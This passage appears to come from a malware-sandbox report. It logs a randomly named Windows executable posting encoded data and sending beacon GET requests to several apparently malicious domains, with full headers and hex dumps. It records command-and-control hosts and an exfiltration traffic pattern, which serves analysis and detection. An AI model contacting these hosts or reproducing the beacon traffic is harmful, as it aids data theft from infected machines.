                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                  Sep 4, 2024 09:38:16.681391001 CEST401INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:16 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.44977664.64.237.133805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:18.237430096 CEST10850OUTPOST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 4a 37 65 6d 6e 47 4e 63 54 4b 48 64 33 72 2b 45 51 53 66 77 72 6f 51 38 68 51 74 50 71 4c 2b 76 52 6c 32 34 42 71 64 73 65 36 54 73 49 69 68 76 55 61 68 32 50 59 41 59 5a 62 72 41 36 6d 6d 74 73 4d 76 4a 62 4e 72 48 66 42 6c 32 48 65 57 52 6f 6b 74 6a 62 6a 70 68 63 4a 57 6a 2b 75 37 58 74 67 45 72 41 63 39 4a 38 63 56 4b 37 72 34 63 44 62 46 30 39 69 38 37 47 2b 6a 2f 78 31 69 74 46 39 52 67 66 45 37 71 58 77 43 53 67 4a 67 45 64 4d 52 44 52 44 36 69 49 6b 55 54 63 67 63 59 53 76 79 44 41 65 37 6c 48 39 64 5a 6b 51 2f 47 6e 58 6b 45 38 47 77 65 34 32 54 4d 32 50 61 4b 63 61 55 55 72 77 58 63 62 32 6f 44 75 4a 52 73 63 6a 31 55 52 73 7a 6c 64 4c 2b 41 6a 57 65 61 38 4f 38 41 4a 44 77 4f 68 41 70 64 47 6a 51 53 7a 6f 59 39 41 4f 77 45 77 44 65 62 4b 69 39 44 74 30 77 47 47 36 4b 4c 79 4e 67 49 61 73 56 49 51 77 65 70 6e 46 6e 31 45 72 4b 5a 39 67 47 35 58 4a 51 53 6b 49 67 64 77 67 62 38 59 6f 61 33 32 55 61 38 6f 32 73 37 44 41 70 2f 49 64 32 6f 64 [TRUNCATED]
                  Data Ascii: 56gD=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL+vRl24Bqdse6TsIihvUah2PYAYZbrA6mmtsMvJbNrHfBl2HeWRoktjbjphcJWj+u7XtgErAc9J8cVK7r4cDbF09i87G+j/x1itF9RgfE7qXwCSgJgEdMRDRD6iIkUTcgcYSvyDAe7lH9dZkQ/GnXkE8Gwe42TM2PaKcaUUrwXcb2oDuJRscj1URszldL+AjWea8O8AJDwOhApdGjQSzoY9AOwEwDebKi9Dt0wGG6KLyNgIasVIQwepnFn1ErKZ9gG5XJQSkIgdwgb8Yoa32Ua8o2s7DAp/Id2odguT7lkE5TH9C3N8cLH6s7u1zuLL3bDEzy2C6hYlU0W+nqCQO3w/CARQHqvoeRgp4CiG7ugBU+FgFGPv8HEK7Kkh4XFttyOGRzbGNkNdtcgYkZ794yk2zUEqZyJd/Fc16CaAhZPDkzvBWmvW4uOmWURnQZh0QgJdaCeVTYFWG7tiLK9m4c+KDebIB0Nn8m/FNj1Ux2VyqecmKbi3QHT39ULAnW2cWfPiqiEQQDShGx4pdsNWPNdiCBdzw0vL0i1+xxsNJe/H/DEjjOLQoGlfTySqtDmGk77W39A1QpsWv0JmyYt6AxtE2z/IAOIxV1fqutYBRAANgpo9/drffKZyl5BBptGDKqPuBz2dLgFtlSYUZFjI/DwaS83AiwGlAPRIOf4ScC/dtv5xqubXLSiaNJ0B3XGTqcsLfsE19j24tOZc06aAlIn9o0uFZjG6ex4FUFaHSfRbwyKFz2czXdwYL/dNA3fk1w65hGMkKO+P4R/BtiX0T0wA2eYW5wy5ZTmf+oIwEn4CPMlyaIaNOwGXQNZqYbPgeb9gpaarxPqsxkZSUrgm72h72XrN4tDHrdbV6eba7+WFroqbCbYCyWboKLNgCwRWC0LXu5L9fFzXxQTPSVLRYlA6lpMrGXXgy6uwj5Dn3KWtsCz7HPuraFBnlmbPYbYw//2ZxFW [TRUNCATED]
                  Sep 4, 2024 09:38:18.803133011 CEST401INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:18 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.44977764.64.237.133805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:20.780143023 CEST482OUTGET /0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:21.370971918 CEST540INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:21 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT
                  Strict-Transport-Security: max-age=31536000
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.44977885.13.151.9805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:26.440450907 CEST769OUTPOST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 4f 50 47 78 54 33 4d 78 4e 4f 46 66 59 42 50 70 2b 54 76 42 32 68 47 73 56 47 49 6c 37 52 77 46 6c 41 55 70 59 43 36 32 45 64 71 4a 39 41 34 78 54 57 5a 62 32 68 70 77 54 50 56 74 6e 78 31 42 4f 50 56 38 61 6d 42 4a 39 75 32 44 57 36 57 53 30 6b 61 6d 4f 44 37 76 50 77 57 32 4b 33 57 54 42 51 59 34 6c 62 51 6f 62 73 33 47 72 6c 46 75 50 71 4b 77 71 6a 51 64 57 56 63 63 44 73 72 43 4c 6b 4d 64 6d 6c 6e 52 43 69 6f 38 4c 64 2b 42 57 50 59 59 6c 54 59 71 43 35 6f 4f 79 63 47 31 76 33 2f 54 6a 77 59 69 32 30 64 72 64 33 79 71 78 76 68 55 77 67 3d 3d
                  Data Ascii: 56gD=4v8DtKRH15LAOPGxT3MxNOFfYBPp+TvB2hGsVGIl7RwFlAUpYC62EdqJ9A4xTWZb2hpwTPVtnx1BOPV8amBJ9u2DW6WS0kamOD7vPwW2K3WTBQY4lbQobs3GrlFuPqKwqjQdWVccDsrCLkMdmlnRCio8Ld+BWPYYlTYqC5oOycG1v3/TjwYi20drd3yqxvhUwg==
                  Sep 4, 2024 09:38:27.086182117 CEST360INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:26 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.44977985.13.151.9805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:28.987690926 CEST789OUTPOST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 42 50 57 78 53 57 4d 78 46 4f 46 63 64 42 50 70 33 7a 76 46 32 68 61 73 56 45 6c 34 37 6b 6f 46 6d 69 4d 70 4b 44 36 32 4e 4e 71 4a 31 67 34 2b 65 32 5a 55 32 68 31 4f 54 4f 35 74 6e 31 6c 42 4f 4f 46 38 61 56 70 4f 38 2b 32 42 4e 71 57 55 37 45 61 6d 4f 44 37 76 50 77 79 63 4b 33 75 54 41 68 49 34 6c 36 51 6e 59 73 33 5a 68 46 46 75 46 36 4b 4b 71 6a 51 46 57 55 77 79 44 71 76 43 4c 68 6f 64 6f 51 4c 51 4d 69 6f 36 50 64 2f 4a 53 4d 31 66 67 6d 52 41 45 37 38 50 33 66 4f 35 71 78 75 4a 79 42 35 31 6b 30 35 59 41 77 37 65 38 73 63 64 72 71 65 35 4c 55 62 70 70 63 6e 59 31 31 53 31 6b 7a 6b 61 53 48 6b 3d
                  Data Ascii: 56gD=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47koFmiMpKD62NNqJ1g4+e2ZU2h1OTO5tn1lBOOF8aVpO8+2BNqWU7EamOD7vPwycK3uTAhI4l6QnYs3ZhFFuF6KKqjQFWUwyDqvCLhodoQLQMio6Pd/JSM1fgmRAE78P3fO5qxuJyB51k05YAw7e8scdrqe5LUbppcnY11S1kzkaSHk=
                  Sep 4, 2024 09:38:29.599603891 CEST360INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:29 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.44978085.13.151.9805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:31.533190012 CEST10871OUTPOST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 42 50 57 78 53 57 4d 78 46 4f 46 63 64 42 50 70 33 7a 76 46 32 68 61 73 56 45 6c 34 37 6b 67 46 6c 58 51 70 59 6b 75 32 66 64 71 4a 70 77 35 35 65 32 5a 7a 32 68 74 53 54 4f 45 57 6e 33 74 42 50 73 64 38 4c 45 70 4f 31 2b 32 42 53 36 57 52 30 6b 61 33 4f 44 72 52 50 77 43 63 4b 33 75 54 41 69 41 34 73 4c 51 6e 65 73 33 47 72 6c 46 59 50 71 4c 6c 71 6a 34 56 57 55 45 4d 44 61 50 43 4c 41 55 64 6c 43 7a 51 45 69 6f 34 43 39 2b 50 53 4d 35 51 67 6d 6c 6d 45 2b 42 71 33 59 4f 35 6d 56 54 7a 32 44 78 42 2b 56 52 77 51 68 76 66 31 50 38 46 71 59 72 41 4b 68 37 70 38 74 33 51 78 79 44 36 31 42 63 4a 45 41 77 31 70 36 65 49 55 4b 4d 7a 7a 76 37 34 74 6d 6d 30 59 33 6c 67 67 4c 6e 6b 38 56 76 4f 31 4a 41 55 6d 35 33 62 73 4f 66 46 74 4a 31 53 35 57 51 2f 43 7a 62 4b 65 4f 42 51 41 47 39 52 37 74 4b 50 6c 4b 53 53 39 5a 6a 51 6a 66 56 6c 45 6e 7a 49 46 38 62 35 77 4d 44 64 61 35 39 4c 31 30 34 65 64 45 63 6c 57 2b 6a 53 66 36 42 75 31 77 2b 6a 62 76 4e 48 78 [TRUNCATED]
                  Data Ascii: 56gD=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47kgFlXQpYku2fdqJpw55e2Zz2htSTOEWn3tBPsd8LEpO1+2BS6WR0ka3ODrRPwCcK3uTAiA4sLQnes3GrlFYPqLlqj4VWUEMDaPCLAUdlCzQEio4C9+PSM5QgmlmE+Bq3YO5mVTz2DxB+VRwQhvf1P8FqYrAKh7p8t3QxyD61BcJEAw1p6eIUKMzzv74tmm0Y3lggLnk8VvO1JAUm53bsOfFtJ1S5WQ/CzbKeOBQAG9R7tKPlKSS9ZjQjfVlEnzIF8b5wMDda59L104edEclW+jSf6Bu1w+jbvNHxoJl3hrxTNLfOdQWONvrJpFG/k8fHMoB0qVFbZGMoJBSsG1LQPfYfnla6IAH0Cly/eAlRuLGn6G2FnYNnI2QTSGvuzcNDoP+/RFPKvBZqCi6W6Lnj4EowPTLQW9zYREoaFAE20XcWU93QWM2+xYG92+Lx0j0/u+Crao+aE3lqaWyVsimAzdKs3fV6Uq2uBgYd0o30mHcYk4W+Aw3X5BnvC0oTAJML8qQTtlHcajoLvTqxIdgNEyBW3DXnpUN6FN3/ACEn3MNW6byaHwPMthHWAUhZYU01m1BGHi9HmApRQmzZIVss+Iia3sOQXrJUhArRePfFPNLEfiIjfY6jArToae6LNUn59alWHJ0Apfs/REk7O8MqTcM3JXtPNMk0aqNVzTR69+dJP7bXwigKI4lN1sH1rdtByqnmo8joZe2Y8Woa15bOCC2tT+jYF2ORhhecACPwLkfQ4j4t7jGuhWOIWYM8x3JVPUkgNqPM7NIFTRt4fG+sIU9Xz6Q9o/7KNlUupW3qCIkCrJwOAg3PJ51cxMOGrMT8AYPAh3jh2+AVjujfg8pE3RTqcmrgKUC0ZE66MLIhEwZv5LniAqSeKCzIS0p2aT+1jWINlK9S/y1CcjwHuCZX6g5dGMOqQsvAQi3FMBZc0ocBOwJ0iyxWiXpvfF8YNB6T1gG4jz [TRUNCATED]
                  Sep 4, 2024 09:38:32.156059980 CEST360INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:32 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.44978185.13.151.9805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:34.321432114 CEST489OUTGET /gs9g/?gTSpc=Khb8pT&56gD=1tUju/dHge3HLZSeaGkKb9xpXzDM3iDxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90/pKfV4KQ80W7DCKACFqXJiPyHwctgLFsPv8= HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:34.942066908 CEST360INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:34 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.449782104.21.35.73805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:40.757430077 CEST739OUTPOST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 31 44 38 4f 53 4c 6e 68 34 4e 67 78 6d 6b 72 44 2b 6c 66 32 46 30 53 68 41 2b 35 37 68 4a 33 7a 6b 49 4a 6d 30 4e 6b 44 69 75 36 44 42 55 75 46 48 77 62 56 47 6a 31 5a 55 69 63 78 56 66 56 75 39 34 65 48 48 59 66 4f 32 4e 4c 6e 30 33 63 44 63 37 33 4a 4d 38 48 41 47 70 61 57 5a 76 2f 49 4e 41 32 30 58 55 68 72 63 46 76 55 33 57 62 54 4a 38 6c 68 47 76 39 74 32 33 4d 44 47 51 75 31 5a 6d 6c 56 74 69 2f 37 43 58 67 36 71 79 59 73 75 34 36 41 52 57 36 37 4f 4a 33 71 48 36 4e 42 71 65 38 4b 34 74 47 37 37 66 55 4c 74 65 4d 5a 6f 49 49 31 4c 77 3d 3d
                  Data Ascii: 56gD=qeu/xX/6/sVZ1D8OSLnh4NgxmkrD+lf2F0ShA+57hJ3zkIJm0NkDiu6DBUuFHwbVGj1ZUicxVfVu94eHHYfO2NLn03cDc73JM8HAGpaWZv/INA20XUhrcFvU3WbTJ8lhGv9t23MDGQu1ZmlVti/7CXg6qyYsu46ARW67OJ3qH6NBqe8K4tG77fULteMZoII1Lw==
                  Sep 4, 2024 09:38:42.235805988 CEST770INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:42 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QrZZmLd3CxMzuhOdmEFVo%2F124P9tHUZ80XAD6guzufB%2BONFGryXrEFtlSU9H0wEOj68pt4VuwrXS2AwU89AGSBWjYM2O7blQDbooMnwCBmO8NPetPQI%2FyUHQM3mMI6Kvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5246ffbd7cb1-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
